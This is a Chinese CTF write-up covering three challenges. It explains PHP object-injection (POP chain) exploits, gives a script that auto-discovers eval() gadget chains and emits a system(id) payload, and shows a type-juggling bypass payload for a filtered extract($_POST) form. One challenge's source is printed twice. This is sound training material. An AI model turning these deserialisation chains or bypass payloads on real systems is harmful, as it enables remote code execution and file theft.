# 0x01 pop_master

打开题目

<?php
// Challenge entry point: deserialises attacker-controlled input and then calls
// one method (its real six-character name is randomised) on the result.
include"class.php";
//class.php.txt
highlight_file(__FILE__);
// Both values are taken straight from the query string; nothing is validated.
$a=$_GET['pop'];
$b=$_GET['argv'];
// unserialize() on untrusted input instantiates any class class.php declares,
// so every method reachable from those objects becomes callable (PHP object
// injection). The safe alternative for data exchange is json_decode().
$class=unserialize($a);
$class->XXXXXX($b); // the six-character method name is generated at random

根据提示信息 下载源码

我滴个乖乖 2M 多的链 16 万行

/**
 * Generated gadget class: both methods hand their only argument straight to
 * eval(), so any chain that reaches them executes attacker-supplied PHP.
 */
class NXlGlW{
public $hGYbeeG;
public function HRD4CW($y3Cae){
// code-execution sink: $y3Cae is evaluated verbatim
eval($y3Cae);

}
public function C3akk9($MSL6W){
// code-execution sink: $MSL6W is evaluated verbatim
eval($MSL6W);

}
}


/**
 * Generated gadget class: GlSPMd() forwards its argument to whichever object
 * sits in the public $E0cUWyC property, which is how one link of a chain hands
 * control to the next; olsElL() is itself an eval() sink.
 */
class qAARvi{
public $E0cUWyC;
public function GlSPMd($XHiV9){
// $BrLVt is not declared on the class, so this creates a dynamic property
// (deprecated since PHP 8.2); it has no other effect here.
$this->BrLVt = "GAVzp";
// $E0cUWyC is public, so the object probed and called below is chosen
// entirely by the serialised payload.
if(method_exists($this->E0cUWyC, 'YAF1Wt')) $this->E0cUWyC->YAF1Wt($XHiV9);
if(method_exists($this->E0cUWyC, 'KfVcH5')) $this->E0cUWyC->KfVcH5($XHiV9);

}
public function olsElL($t43I8){
// undeclared property, see $BrLVt above
$this->v35pY = "TNiWd";
// code-execution sink: $t43I8 is evaluated verbatim
eval($t43I8);

}
}
//......

函数名、类名随机生成,最终链成后用 eval 执行 system("cat /flag");

太菜了不会写脚本 用手工找几十个就行了,有大佬会写脚本的教教我

贴一个 大佬的脚本

<?php
// Static gadget-chain finder for class.php: collects every method whose body
// contains eval() and then walks backwards through the methods that call it.
include_once "class.php";

// exp_1.php is expected to define $arr, one instance of every class in class.php
// (see the sketch below); getcaller() and the loops rely on it.
include_once "exp_1.php";
/**
*
* $arr = [
* new AAA(),
* new BBB(),
* ...
* ];
*
*/

// The source is kept as an array of lines so that ReflectionMethod start/end
// line numbers can be used to slice out each method body.
$source = file_get_contents('class.php');
$fsource = preg_split('/' . PHP_EOL . '/', $source);

$evalfuncarr = []; // [['class' => object, 'func' => method name], ...] for every eval() sink found
$popchain = [];
$i = []; // unused: nothing in this script reads it

/**
 * Returns true when $fname is a method name that the search must skip.
 *
 * The list is hard-coded for the class.php this script was written against.
 * Comparison is deliberately loose, matching the original `==` check for
 * string method names.
 */
function isfuncblacklist($fname) {
    static $blacklist = ['MISVgg'];
    return in_array($fname, $blacklist);
}

// Pass 1: record every (object, method) pair whose source text contains 'eval'.
foreach ($arr as $a) {
$methods=get_class_methods($a);
foreach ($methods as $method) {
$func = new ReflectionMethod($a, $method);
if(isfuncblacklist($func->name)) {
continue;
}
$f = $func->getFileName(); // unused
// getStartLine() is 1-based while $fsource is 0-based, hence the -1.
$start_line = $func->getStartLine() - 1;
$end_line = $func->getEndLine();
$length = $end_line - $start_line;
$body = implode(PHP_EOL, array_slice($fsource, $start_line, $length));
// Plain substring test: a body that merely mentions "eval" in a string or
// comment is collected as well.
if(strstr($body, 'eval')){
array_push($evalfuncarr, array('class'=>$a, 'func'=>$method));
}
}
}

/**
 * Returns the first method (other than $funcname itself) whose body mentions
 * $funcname, i.e. a method that can call it, or NULL when none is found.
 *
 * Only the first hit is returned, so the walk follows a single path rather
 * than the full call graph. $blacklist is imported as a global but never used
 * here; the exclusion list lives in isfuncblacklist().
 *
 * @return array{class: object, func: string}|null
 */
function getcaller($funcname) {
global $arr, $fsource, $blacklist;
foreach($arr as $a) {
$methods=get_class_methods($a);
foreach ($methods as $method) {
$func = new ReflectionMethod($a, $method);
// The sliced body starts at the signature line, so a method always
// contains its own name; skip it.
if($func->name === $funcname) {
continue;
}
if(isfuncblacklist($func->name)) {
continue;
}
$f = $func->getFileName(); // unused
$start_line = $func->getStartLine() - 1;
$end_line = $func->getEndLine();
$length = $end_line - $start_line;
$body = implode(PHP_EOL, array_slice($fsource, $start_line, $length));
// Substring match on the name: a method_exists() probe counts the same as
// a real call.
if(strstr($body, $funcname)){
return array(
'class' => $a,
'func' => $method
);
}
}
}
return NULL;
}

$finded = false; // never set to true below (the assignment is commented out), so every sink is explored

// Pass 2: from each eval() sink walk caller-of-caller until either no caller
// exists (dead end) or the chain reaches a method named BrtDix (presumably the
// randomised entry method of this challenge instance). There is no visited set,
// so a pair of methods that mention each other would loop forever.
foreach($evalfuncarr as $a) {
if($finded == true){
break;
}
$ret = $a;
$popchain = [];
while(1) {
$ret = getcaller($ret['func']);
if($ret == NULL) {
// Dead end: the chain is abandoned (nothing reads $popchain after this).
array_pop($popchain);
break;
}
array_push($popchain, $ret);
printf("\r[-] %s", $ret['func']);
// BrtDix
if($ret['func'] == 'BrtDix') {
printf("\n");
var_dump($popchain);
foreach($popchain as $p) {
printf("%s::%s -> ", get_class($p['class']), $p['func']);
};
// valid
valid($a, $popchain);
// $finded = true;
break;
}
}
}

/**
 * Emits a standalone PHP script that instantiates the discovered chain, prints
 * it, and writes it to test_<sink method>.php for manual checking.
 *
 * $evalfunc is the eval() sink ['class' => object, 'func' => name]; $chain is
 * the list returned by the caller walk, innermost link first. Each link is
 * wired to the previous one through its FIRST public property, so this
 * assumes every gadget class exposes exactly one property.
 */
function valid($evalfunc, $chain) {
$code = "<?php\n";
$code .= "include_once 'class.php';";
$code .= "\$e = new ".get_class($evalfunc['class'])."();\n";
for ($i=0; $i < sizeof($chain); $i++) {
$tmp = $chain[$i];
// first declared public property of this link's class
$propname = array_keys(get_object_vars($tmp['class']))[0];
$t = $i - 1;
$code .= "\$a{$i} = new ".get_class($tmp['class'])."();\n";
if($i == 0) {
$code .= "\$a{$i}->{$propname} = \$e;\n";
} else {
$code .= "\$a{$i}->{$propname} = \$a{$t};\n";
}
}
// the outermost link is the one the entry point calls
$m = sizeof($chain)-1;
$code .= "\$a{$m}->BrtDix('system(id);// ');";
echo $code;
echo "\n\n";
file_put_contents("test_".$evalfunc['func'].".php", $code);
}

# 0x02 [强网先锋] 赌徒

在这里插入图片描述
打开网站 看到一串提示信息,
www.zip 下载源码

<meta charset="utf-8">
<?php
//hint is in hint.php
// error_reporting(1) keeps only E_ERROR, so warnings such as reading the
// undeclared Info::$file below are silently dropped.
error_reporting(1);


/**
 * First link of the deserialisation chain: __wakeup() runs automatically on
 * every instance produced by unserialize(), and _sayhello() echoes $name,
 * which converts an object stored there via its __toString().
 */
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");'; // decoy string: only ever echoed in __get()

public function __construct(){
echo "I think you need /etc/hint . Before this you need to see the source code";
}

public function _sayhello(){
// $name is public, so the serialised payload decides what is echoed here.
echo $this->name;
return 'ok';
}

public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}

/**
 * Second link: __toString() reads $this->file['filename'], a property that is
 * not declared here (it exists only if the serialised payload adds it), and
 * then accesses ->ffiillee on whatever object it holds, which triggers that
 * object's __get() when the property is inaccessible.
 */
class Info
{
private $phonenumber=123123;
public $promise='I do';

public function __construct(){
$this->promise='I will not !!!!';
return $this->promise; // a constructor's return value is ignored
}

public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}

/**
 * Final link: __get() calls whatever the public $a property holds as a
 * function. When $a is another Room that means Room::__invoke(), which reads
 * $filename from disk and echoes it base64-encoded.
 */
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';

public function __get($name){
// $a is payload-controlled: a function name string or an object with __invoke()
$function = $this->a;
return $function();
}

public function Get_hint($file){
// Arbitrary-file-read sink: $file is used as a path with no restriction.
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}

public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content; // Get_hint() returns null, so nothing more is printed
}
}

// unserialize() on a raw query parameter is the injection point: every class
// above is in scope and Start::__wakeup() fires before anything else runs.
if(isset($_GET['hello'])){
unserialize($_GET['hello']);
}else{
$hi = new Start();
}

?>
<meta charset="utf-8">
<?php
//hint is in hint.php
// error_reporting(1) keeps only E_ERROR, so warnings such as reading the
// undeclared Info::$file below are silently dropped.
error_reporting(1);


/**
 * First link of the deserialisation chain: __wakeup() runs automatically on
 * every instance produced by unserialize(), and _sayhello() echoes $name,
 * which converts an object stored there via its __toString().
 */
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");'; // decoy string: only ever echoed in __get()

public function __construct(){
echo "I think you need /etc/hint . Before this you need to see the source code";
}

public function _sayhello(){
// $name is public, so the serialised payload decides what is echoed here.
echo $this->name;
return 'ok';
}

public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}

/**
 * Second link: __toString() reads $this->file['filename'], a property that is
 * not declared here (it exists only if the serialised payload adds it), and
 * then accesses ->ffiillee on whatever object it holds, which triggers that
 * object's __get() when the property is inaccessible.
 */
class Info
{
private $phonenumber=123123;
public $promise='I do';

public function __construct(){
$this->promise='I will not !!!!';
return $this->promise; // a constructor's return value is ignored
}

public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}

/**
 * Final link: __get() calls whatever the public $a property holds as a
 * function. When $a is another Room that means Room::__invoke(), which reads
 * $filename from disk and echoes it base64-encoded.
 */
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';

public function __get($name){
// $a is payload-controlled: a function name string or an object with __invoke()
$function = $this->a;
return $function();
}

public function Get_hint($file){
// Arbitrary-file-read sink: $file is used as a path with no restriction.
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}

public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content; // Get_hint() returns null, so nothing more is printed
}
}

// unserialize() on a raw query parameter is the injection point: every class
// above is in scope and Start::__wakeup() fires before anything else runs.
if(isset($_GET['hello'])){
unserialize($_GET['hello']);
}else{
$hi = new Start();
}

?>

很明显反序列化 pop 链 最终执行 Get_hint file_get_contents 获得 flag

__invoke()  //当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。
__get() //当我们试图获取一个不可达属性时(比如private),类会自动调用__get函数。
start=》wakeup=》sayhello =》Info=》toString=》this->room=》get =>room=》invoke

<?php
// Local stand-in for the challenge class: only the public properties matter to
// serialize(), so the methods are left out.
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';
}
// Stand-in for Info. PHP class names are case-insensitive, so the serialised
// name "info" still resolves to the server's Info class.
class info
{
public $promise;
}
// Stand-in for Room; $a is the property the server-side __get() calls.
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';

}
// Build the object graph Start -> info -> Room -> Room and print it serialised.
$info = new info();
$start = new start();
$room = new Room();
$start->name = $info;
// 'file' is not declared on info: this creates a dynamic property, which
// serialize() includes like any other.
$start->name->file['filename']=$room;
$room->a = new room();
echo serialize($start);
/*
$st=new Start();
$st->name=new info();
$st->name->file['filename']=new Room();
$st->name->file['filename']->a=new Room();
print_r(serialize($st));
*/

记得要把开头的 hi 去掉再解码啊~

# 0x03 [强⽹先锋] 寻宝

key1 常见绕过

<?php
header('Content-type:text/html;charset=utf-8');
highlight_file(__file__); // magic constants are case-insensitive: same as __FILE__

/**
 * Removes every occurrence of a fixed set of substrings from $string.
 *
 * The list mixes plain words with already-escaped PCRE metacharacters ('\$',
 * '\(', '\.', '\/', '\,') because it is joined straight into one alternation
 * and applied in a single pass, so text exposed by one removal is not
 * re-scanned. Matching is case-sensitive.
 */
function filter($string){
    static $pattern = null;
    if ($pattern === null) {
        $blocked = ['php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000'];
        $pattern = sprintf('/%s/', implode('|', $blocked));
    }
    return preg_replace($pattern, '', $string);
}


// $ppp has not been assigned yet, so this guard only reads an undefined
// variable; the unset() never runs.
if($ppp){
unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1"; // sic: the key read below is 'number3', so it is undefined unless POSTed
$ppp['number4'] = '1';
$ppp['number5'] = '1';

// extract($_POST) imports every POST field as a local variable, so a posted
// ppp[...] array replaces the defaults above as a whole. This is the classic
// variable-injection footgun: any local, not just $ppp, can be overwritten.
extract($_POST);

// Each value goes through the substring blacklist before any check.
$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);


// Gate 1 rejects only what is_numeric() accepts; the `> 1024` test below still
// compares a non-numeric string with an int under PHP's coercion rules.
if(isset($num1) && is_numeric($num1)){
die("非数字");
}

else{

if($num1 > 1024){
echo "第一层";
// Gate 2: at most 4 characters, yet `$num2 + 1` (evaluated numerically
// before intval()) must exceed 500000.
if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
echo "第二层";
// Gate 3: the first 7 hex digits of md5($num3) must equal '4bf21cd'.
if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
echo "第三层";
// Gate 4: loose `== 0` plus a byte length of exactly 7.
if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
echo "第四层";
if(!isset($num5)||(strlen($num5)==0)) die("no");
// Gate 5: @ silences json_decode() warnings. The assignment inside the
// condition stores `$b === NULL` in $y, so the inner `$y === true` test
// is always satisfied once this branch is taken.
$b=json_decode(@$num5);
if($y = $b === NULL){
if($y === true){
echo "第五层";
// The key file is only included after all five gates.
include 'KeY1lhv.php';
echo $KEY1;
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no111");
}
}
ppp[number1]=6666a&ppp[number2]=1e10&ppp[number3]=61823470&ppp[number4]=0abcdef&ppp[number5]=adada

第二个文件下载了,提示如下:
Mr.Smith 先生和 Tang 在 5 月份的时候在一个画展进行了接触,并且在某些地方写下了一些东西
我们将该月有关画展的信息做了汇总,希望你能够从中获取一些信息

压缩包用任何支持分段下载的下载器都可以下载

文件中有五个图片 干扰我好久

最终发现 key2 以明文形式存在 docx 中

key2

贴出寻找脚本

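import os
from docx import Document

# Directory to scan; adjust to the extracted archive location.
path = r"C:\Users\xxxxx\Desktop\five_month"
str_to_search = "KEY2"  # or: input("Enter the string to search for: ")


def search_str_in_paragraph(str_to_search, paragraph):
    """Return the index of the first occurrence of str_to_search in paragraph.text.

    Raises ValueError (from str.index) when the text does not contain it; the
    loop below only calls this after an `in` check, so that never happens there.
    """
    str_index = paragraph.text.index(str_to_search)
    return str_index


for root, dirs, files in os.walk(path, topdown=False):
    for file in files:
        # splitext() copes with names that have no dot or several dots, where
        # file.split(".")[1] raised IndexError or picked the wrong part.
        filename, ext = os.path.splitext(file)
        if ext.lower() == ".docx":
            full_path = os.path.join(root, file)
            doc = Document(full_path)
            for paragraph in doc.paragraphs:
                if str_to_search in paragraph.text:
                    str_index = search_str_in_paragraph(str_to_search, paragraph)
                    # Clamp the window start at 0: a negative slice start would
                    # count from the end of the string and print the wrong text.
                    window = paragraph.text[max(str_index - 10, 0):str_index + 10]
                    print(window, "-----", filename, "-----", full_path)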

在这里插入图片描述
![](https://img-blog.csdnimg.cn/20210615112844856.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM0MDk3NDk3,size_16,color_FFFFFF,t_70)

在这里插入图片描述